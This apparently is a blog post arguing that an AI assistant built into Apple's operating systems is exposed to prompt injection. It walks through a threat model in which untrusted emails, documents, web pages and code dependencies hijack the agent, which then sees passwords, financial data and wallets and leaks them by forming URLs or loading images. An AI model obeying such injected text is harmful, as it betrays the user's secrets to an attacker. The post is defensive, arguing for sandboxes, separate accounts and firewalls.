I hope you are able to use the latest Apple OSs with Siri AI completely turned off. I believe that, as described, it will be a fertile ground for malware reminiscent of Windows 20 years ago.
I would love if anyone has information about the details of Siri AI that refute this.
1. Stopping prompt injections is impossible right now.
To back this up, read Anthropic’s system card for Opus 4.8. Page 77 shows the various top model’s probability of stopping prompt injections. Opus 4.8 is just under 10% with 100 attempts. Gemini (which Siri is based on) is 45% with 100 attempts.
This may be an inevitable and unsolvable problem. So …
2. We must assume that any Agent that has been exposed to text that we don’t trust is under the control of an adversary.
This is a design constraint right now. The rest of the system must be architected around this assumption.
I would never run an agent on my personal machine, because …
3. There is a lot of untrusted text on my personal devices.
Here is a partial list: All incoming emails and texts, all documents I didn’t write, all e-books, sites I browse. Siri AI can “look” at apps I am running. If you code on your machine, then all dependencies (every README, skill, etc).
This means that any file type with text is potential malware, not just executables or scripts.
But that’s not the only thing on your machine …
4. There are also a lot of “secrets” on your machine
The partial list above also includes your trusted text with your secrets. Things like: your passwords (if you let Siri AI reset them as shown in the keynote), your emails and texts, photos, financial information, personal documents, and bitcoin wallets.
So, you have a high potential to let an AI Agent that is under an adversary’s control see a secret. This is not ok, because …
5. The Agent is able to “do things”
For example: form a URL and make a network request with it, control applications, show an image from the internet (which is a special case of requesting a URL).
Siri AI will likely ask for approval, but …
6. Approval-based permission models don’t work
There is no way to make an informed decision about what is safe for an AI Agent to do. Even so, you won’t likely be asked to approve URL requests. Also, approval fatigue is real.
Apple didn’t show any permission prompts, but I assume that there will be some because they are not using …
7. The “better” (not perfect) solution is sandboxes, firewalls, OS-level auth
My opinion is the best way to run agents is in sandboxes with their own accounts (not as you or super-user) with OS-level authorization and firewalls in place. And then … just let the agent go.
The agent will be exposed to prompt injections, but there are no secrets in the VM and I limit its actions the same way I would limit a logged in user on a shared machine. This is just normal system level user access control.
I wrote about this more in Escaping the Lethal Trifecta of AI Agents and Limiting the Chance of Code Agent Prompt Injections